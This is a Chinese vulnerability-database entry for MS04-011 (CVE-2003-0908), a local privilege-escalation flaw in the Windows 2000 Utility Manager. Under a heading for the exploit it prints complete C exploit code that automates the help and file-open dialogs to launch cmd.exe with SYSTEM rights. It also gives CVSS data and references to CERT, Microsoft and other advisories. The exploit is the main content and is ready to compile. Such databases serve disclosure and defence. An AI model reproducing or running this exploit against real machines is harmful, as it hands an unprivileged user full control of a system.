Microsoft Windows工具管理器权限提升漏洞(MS04-011)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107884 漏洞类型 访问验证错误
发布时间 2004-04-15 更新时间 2007-10-02
CVE编号 CVE-2003-0908 CNNVD-ID CNNVD-200406-015
漏洞平台 Windows CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/271
https://www.securityfocus.com/bid/10124
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200406-015
|漏洞详情
MicrosoftWindows2000包含工具管理器用于计算机,性能服务等管理。工具管理器在启动执行应用程序时存在权限提升,本地登录用户可利用此漏洞以系统权限启动任意应用程序而控制系统。目前没有详细漏洞细节提供。
|漏洞EXP
// By Cesar Cerrudo cesar appsecinc com
// Local elevation of priviliges exploit for Windows Utility Manager
// Gives you a shell with system privileges
// If you have problems try changing Sleep() values.

#include <stdio.h> 
#include <windows.h> 
#include <commctrl.h>
#include <Winuser.h>

int main(int argc, char *argv[]) 
{ 
  HWND lHandle, lHandle2;
  POINT point;

  char sText[]="%windir%\\system32\\cmd.ex?";

  // run utility manager
  system("utilman.exe /start");
  Sleep(500);

  // execute contextual help
  SendMessage(FindWindow(NULL, "Utility manager"), 0x4D, 0, 0);
  Sleep(500);

  // open file open dialog windown in Windows Help
  PostMessage(FindWindow(NULL, "Windows Help"), WM_COMMAND, 0x44D, 0);
  Sleep(500);

  // find open file dialog window
  lHandle = FindWindow("#32770","Open");

  // get input box handle
  lHandle2 = GetDlgItem(lHandle, 0x47C);
  Sleep(500);

  // set text to filter listview to display only cmd.exe
  SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)sText);
  Sleep(800);

  // send return
  SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);

  //get navigation bar handle
  lHandle2 = GetDlgItem(lHandle, 0x4A0);
  //send tab
  SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);
  Sleep(500);
  lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL);
  //get list view handle
  lHandle2 = GetDlgItem(lHandle2, 0x1);

  SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0); // send "c" char
  SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0); // send "m" char
  SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0); // send "d" char
  Sleep(500);
  
  // popup context menu
  PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0);
  Sleep(1000);

  // get context menu handle
  point.x =10; point.y =30;
  lHandle2=WindowFromPoint(point);

  SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0);   // move down in menu
  SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0);   // move down in menu
  SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0); // send return

  SendMessage (lHandle, WM_CLOSE,0,0); // close open file dialog window

  return(0);
}




// milw0rm.com [2004-04-15]
|受影响的产品
Microsoft Windows 2000 Server SP4 Microsoft Windows 2000 Server SP3 Microsoft Windows 2000 Server SP2 Microsoft Windows 2000 Server SP1 Microsoft Windows 2000 Server
|参考资料

来源:US-CERTVulnerabilityNote:VU#526084
名称:VU#526084
链接:http://www.kb.cert.org/vuls/id/526084
来源:US-CERTTechnicalAlert:TA04-104A
名称:TA04-104A
链接:http://www.us-cert.gov/cas/techalerts/TA04-104A.html
来源:MS
名称:MS04-011
链接:http://www.microsoft.com/technet/security/bulletin/ms04-011.mspx
来源:www.appsecinc.com
链接:http://www.appsecinc.com/resources/alerts/general/04-0001.html
来源:VULNWATCH
名称:20040414[SHATTERTeamSecurityAlert]MicrosoftWindowsUtilityManagerVulnerability
链接:http://archives.neohapsis.com/archives/vulnwatch/2004-q1/0082.html
来源:XF
名称:win2k-utilitymgr-gain-privileges(15632)
链接:http://xforce.iss.net/xforce/xfdb/15632
来源:BID
名称:10124
链接:http://www.securityfocus.com/bid/10124
来源:www.securiteam.com
链接:http://www.securiteam.com/windowsntfocus/5LP0C2ACKU.html
来源:CIAC
名称:O-114
链接:http://www.ciac.org/ciac/bulletins/o-114.shtml
来源:USGovernmentResource:oval:org.mitre.oval:def:1046
名称:oval:org.mitre.oval:def:1046
链接:http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:1046